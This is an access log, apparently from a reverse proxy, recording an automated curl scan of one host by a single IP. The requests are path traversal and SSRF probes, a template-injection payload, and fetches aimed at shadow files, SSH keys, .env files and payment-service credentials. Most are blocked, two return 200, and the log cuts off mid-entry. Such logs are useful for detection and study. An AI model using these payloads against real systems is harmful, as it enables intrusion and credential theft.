+[21/Jan/2026:01:25:41 +0000] - 404 404 - GET https nas.profibot.hu "/etc/shadow" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:41 +0000] - 404 404 - GET https nas.profibot.hu "/auth/openid-config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:41 +0000] - 404 404 - GET https nas.profibot.hu "/config/stripe.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:41 +0000] - 404 404 - GET https nas.profibot.hu "/dao-voting-config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:41 +0000] - 404 404 - GET https nas.profibot.hu "/teamcity-settings.xml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:42 +0000] - - 403 - GET https nas.profibot.hu "/?data=http://internal/" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:42 +0000] - 404 404 - GET https nas.profibot.hu "/oauth/userinfo" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:42 +0000] - 404 404 - GET https nas.profibot.hu "/out/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:42 +0000] - 403 403 - GET https nas.profibot.hu "/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/hosts" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:42 +0000] - 404 404 - GET https nas.profibot.hu "/administrator/index.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:42 +0000] - 404 404 - GET https nas.profibot.hu "/klarna/config.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:42 +0000] - 404 404 - GET https nas.profibot.hu "/bigcommerce/ssr.config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:42 +0000] - - 403 - GET https nas.profibot.hu "/?module=../../../../etc/hosts" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:42 +0000] - 404 404 - GET https nas.profibot.hu "/venmo/api_keys.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:42 +0000] - - 403 - GET https nas.profibot.hu "/?content=../../../../etc/hostname" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:42 +0000] - 404 404 - GET https nas.profibot.hu "/ci/config.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:42 +0000] - 403 403 - GET https nas.profibot.hu "/.config/config.toml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:42 +0000] - 404 404 - GET https nas.profibot.hu "/facial/config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:42 +0000] - 404 404 - GET https nas.profibot.hu "/build.sh" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:42 +0000] - 404 404 - GET https nas.profibot.hu "/mysql.dump" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:42 +0000] - 404 404 - GET https nas.profibot.hu "/downloader/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:42 +0000] - 404 404 - GET https nas.profibot.hu "/etc/ssl/private/mail.key" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:42 +0000] - - 403 - GET https nas.profibot.hu "/?doc=../../../../root/.bash_history" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:42 +0000] - 404 404 - GET https nas.profibot.hu "/doc/api/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:42 +0000] - 404 404 - GET https nas.profibot.hu "/merchant/onboarding_form.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:42 +0000] - 404 404 - GET https nas.profibot.hu "/test_results.xml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:42 +0000] - 404 404 - GET https nas.profibot.hu "/config/prod.exs" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:42 +0000] - - 403 - GET https nas.profibot.hu "/?source=../../../../var/log/nginx/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:42 +0000] - - 403 - GET https nas.profibot.hu "/?data=../../../../var/log/nginx/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:43 +0000] - 404 404 - GET https nas.profibot.hu "/var/log/apache2/access.log" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:43 +0000] - 404 404 - GET https nas.profibot.hu "/referral/program_rules.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:43 +0000] - 404 404 - GET https nas.profibot.hu "/wp-admin/admin-post.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:43 +0000] - - 403 - GET https nas.profibot.hu "/?page=../../../../etc/hostname" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:43 +0000] - 404 404 - GET https nas.profibot.hu "/auth/token?jwt=abc.def.ghi&refresh=token" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:43 +0000] - 404 404 - GET https nas.profibot.hu "/medusa/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:43 +0000] - 404 404 - GET https nas.profibot.hu "/autonomous/control.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:43 +0000] - 404 404 - GET https nas.profibot.hu "/ghost/signin/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:43 +0000] - - 403 - GET https nas.profibot.hu "/?path=../../../../home/user/.ssh/id_rsa" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:43 +0000] - - 403 - GET https nas.profibot.hu "/?callback=../../../../root/.bash_history" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:43 +0000] - 404 404 - GET https nas.profibot.hu "/coinbase.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:43 +0000] - 403 403 - GET https nas.profibot.hu "/.yarnrc.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:43 +0000] - - 403 - GET https nas.profibot.hu "/?lang=../../../../var/log/nginx/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:43 +0000] - 403 403 - GET https nas.profibot.hu "/..%255c..%255c..%255c..%255c..%255c..%255cvar/log/apache2/access.log" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:43 +0000] - - 403 - GET https nas.profibot.hu "/?data=../../../../.env" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:43 +0000] - - 403 - GET https nas.profibot.hu "/?action=../../../../etc/php.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:43 +0000] - 404 404 - GET https nas.profibot.hu "/extension/settings.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:43 +0000] - - 403 - GET https nas.profibot.hu "/?doc=../../../../etc/passwd" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:43 +0000] - 404 404 - GET https nas.profibot.hu "/opt/mailcow/data/conf/dovecot/dovecot.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:43 +0000] - - 403 - GET https nas.profibot.hu "/?template=../../../../etc/passwd" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:43 +0000] - - 403 - GET https nas.profibot.hu "/?navigation=../../../../etc/php.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:44 +0000] - 200 200 - GET https nas.profibot.hu "/?page=..%2f..%2f..%2fetc%2fpasswd" [Client 185.177.72.49] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:44 +0000] - 404 404 - GET https nas.profibot.hu "/src/routes/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:44 +0000] - - 403 - GET https nas.profibot.hu "/?template_file=../../../../root/.bash_history" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:44 +0000] - 404 404 - GET https nas.profibot.hu "/goto?dest=" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:44 +0000] - - 403 - GET https nas.profibot.hu "/?source=../../../../etc/hostname" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:44 +0000] - 404 404 - GET https nas.profibot.hu "/payments/config/gateway.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:44 +0000] - 404 404 - GET https nas.profibot.hu "/mercadopago/settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:44 +0000] - 404 404 - GET https nas.profibot.hu "/sparkpost/settings.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:44 +0000] - 404 404 - GET https nas.profibot.hu "/protonmail/settings.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:44 +0000] - 404 404 - GET https nas.profibot.hu "/api/token" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:44 +0000] - - 400 - GET https nas.profibot.hu "-" [Client 185.177.72.49] [Length 154] [Gzip -] [Sent-to ] "-" "-" +[21/Jan/2026:01:25:44 +0000] - - 400 - GET https nas.profibot.hu "-" [Client 185.177.72.49] [Length 154] [Gzip -] [Sent-to ] "-" "-" +[21/Jan/2026:01:25:44 +0000] - 404 404 - GET https nas.profibot.hu "/app.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:44 +0000] - 404 404 - GET https nas.profibot.hu "/conf/custom.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:44 +0000] - 404 404 - GET https nas.profibot.hu "/sdk/payments/init.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:44 +0000] - 404 404 - GET https nas.profibot.hu "/app-release.apk" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:44 +0000] - - 403 - GET https nas.profibot.hu "/?dest=http://localhost" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:44 +0000] - 404 404 - GET https nas.profibot.hu "/etc/envoy/envoy.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:44 +0000] - 404 404 - GET https nas.profibot.hu "/webhook/send" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:45 +0000] - 404 404 - GET https nas.profibot.hu "/////////////etc/shadow" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:45 +0000] - - 403 - GET https nas.profibot.hu "/?doc=../../../../var/log/apache2/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:45 +0000] - 404 404 - GET https nas.profibot.hu "/k8s/deployment.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:45 +0000] - - 403 - GET https nas.profibot.hu "/?page=../../../../home/user/.ssh/id_rsa" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:45 +0000] - - 403 - GET https nas.profibot.hu "/?lang=../../../../etc/php.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:45 +0000] - 404 404 - GET https nas.profibot.hu "/erp/accounting_rules.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:45 +0000] - - 400 - GET https nas.profibot.hu "-" [Client 185.177.72.49] [Length 154] [Gzip -] [Sent-to ] "-" "-" +[21/Jan/2026:01:25:45 +0000] - - 403 - GET https nas.profibot.hu "/?page=../../../../var/log/apache2/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:45 +0000] - 404 404 - GET https nas.profibot.hu "/data/config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:45 +0000] - 404 404 - GET https nas.profibot.hu "///////windows/win.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:45 +0000] - 404 404 - GET https nas.profibot.hu "/prometheus" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:45 +0000] - 404 404 - GET https nas.profibot.hu "/vendor_accounts/api_keys.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:45 +0000] - 403 403 - GET https nas.profibot.hu "/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afroot/.bash_history" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:45 +0000] - 404 404 - GET https nas.profibot.hu "/var/cache/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:45 +0000] - - 403 - GET https nas.profibot.hu "/?lang=../../../../etc/hosts" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:45 +0000] - - 403 - GET https nas.profibot.hu "/?view=../../../../etc/mysql/my.cnf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:45 +0000] - 404 404 - GET https nas.profibot.hu "/coral/settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:45 +0000] - 404 404 - GET https nas.profibot.hu "/templates/beez3/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:45 +0000] - 404 404 - GET https nas.profibot.hu "/api/v1/invoices/4/pdf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:45 +0000] - 404 404 - GET https nas.profibot.hu "/notebook.ipynb" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:45 +0000] - 404 404 - GET https nas.profibot.hu "/administrator" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:46 +0000] - 404 404 - GET https nas.profibot.hu "/api/account/delete?auth=1" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:46 +0000] - 404 404 - GET https nas.profibot.hu "/windows/system32/config/SAM" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:46 +0000] - 404 404 - GET https nas.profibot.hu "/opcua/config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:46 +0000] - 404 404 - GET https nas.profibot.hu "/netlify/functions/cart.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:46 +0000] - 403 403 - GET https nas.profibot.hu "/..%5c..%5c..%5c..%5c..%5c..%5cetc/hosts" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:46 +0000] - 404 404 - GET https nas.profibot.hu "/adminpanel/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:46 +0000] - 404 404 - GET https nas.profibot.hu "/pos/terminal_settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:46 +0000] - 404 404 - GET https nas.profibot.hu "/src/config/coinbase.ts" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:46 +0000] - 404 404 - GET https nas.profibot.hu "/k8s/pods.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:46 +0000] - 404 404 - GET https nas.profibot.hu "/routes/web.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:46 +0000] - 404 404 - GET https nas.profibot.hu "/api/teams/1/members" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:46 +0000] - 404 404 - GET https nas.profibot.hu "/staging/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:46 +0000] - 404 404 - GET https nas.profibot.hu "/points/ledger.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:46 +0000] - 404 404 - GET https nas.profibot.hu "/buckconfig" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:46 +0000] - - 403 - GET https nas.profibot.hu "/?data=../../../../var/log/apache2/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:46 +0000] - - 403 - GET https nas.profibot.hu "/?callback=../../../../var/log/apache2/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:46 +0000] - 404 404 - GET https nas.profibot.hu "/smtp-relay/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:46 +0000] - 403 403 - GET https nas.profibot.hu "/root/.bash_history" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:46 +0000] - - 403 - GET https nas.profibot.hu "/fetch?target=http://internal-api" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:46 +0000] - 404 404 - GET https nas.profibot.hu "/shopify.theme.toml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:46 +0000] - 404 404 - GET https nas.profibot.hu "/requirements.txt" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:46 +0000] - - 403 - GET https nas.profibot.hu "/?config=../../../../etc/shadow" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:46 +0000] - 404 404 - GET https nas.profibot.hu "/plugins/payments/stripe.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:47 +0000] - 404 404 - GET https nas.profibot.hu "/index.php~" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:47 +0000] - - 403 - GET https nas.profibot.hu "/?file=../../../../wp-config.php" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:47 +0000] - 404 404 - GET https nas.profibot.hu "/test-ssrf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:47 +0000] - 404 404 - GET https nas.profibot.hu "/web.config" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:47 +0000] - 404 404 - GET https nas.profibot.hu "/legacy/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:47 +0000] - 404 404 - GET https nas.profibot.hu "/boleto/keys.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:47 +0000] - 404 404 - GET https nas.profibot.hu "/phpMyAdmin/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:47 +0000] - 200 200 - GET https nas.profibot.hu "/?tpl={{constructor.constructor(%27alert(1)%27)()}}" [Client 185.177.72.49] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:47 +0000] - 404 404 - GET https nas.profibot.hu "/cypress.config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:47 +0000] - 404 404 - GET https nas.profibot.hu "/config/runtime.exs" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:47 +0000] - 404 404 - GET https nas.profibot.hu "/zimbra/conf/localconfig.xml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:47 +0000] - - 403 - GET https nas.profibot.hu "/?navigation=../../../../etc/passwd" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:47 +0000] - - 403 - GET https nas.profibot.hu "/?doc=../../../../etc/shadow" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:47 +0000] - 404 404 - GET https nas.profibot.hu "/index.php/login" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:47 +0000] - 404 404 - GET https nas.profibot.hu "/smtp-client/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:47 +0000] - 404 404 - GET https nas.profibot.hu "/amavis/conf.d/50-user" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:47 +0000] - - 403 - GET https nas.profibot.hu "/?document=../../../../etc/mysql/my.cnf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:47 +0000] - 404 404 - GET https nas.profibot.hu "/env.old" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:47 +0000] - 404 404 - GET https nas.profibot.hu "/admin/upgrade" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:47 +0000] - 404 404 - GET https nas.profibot.hu "/storefront/config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:47 +0000] - 404 404 - GET https nas.profibot.hu "/paddle/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:47 +0000] - - 403 - GET https nas.profibot.hu "/?theme=../../../../etc/hostname" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:48 +0000] - 404 404 - GET https nas.profibot.hu "/vr/scene_config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:48 +0000] - 404 404 - GET https nas.profibot.hu "/corebanking/settings.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:48 +0000] - - 403 - GET https nas.profibot.hu "/?layout=../../../../wp-config.php" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:48 +0000] - 404 404 - GET https nas.profibot.hu "/cdn/config.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:48 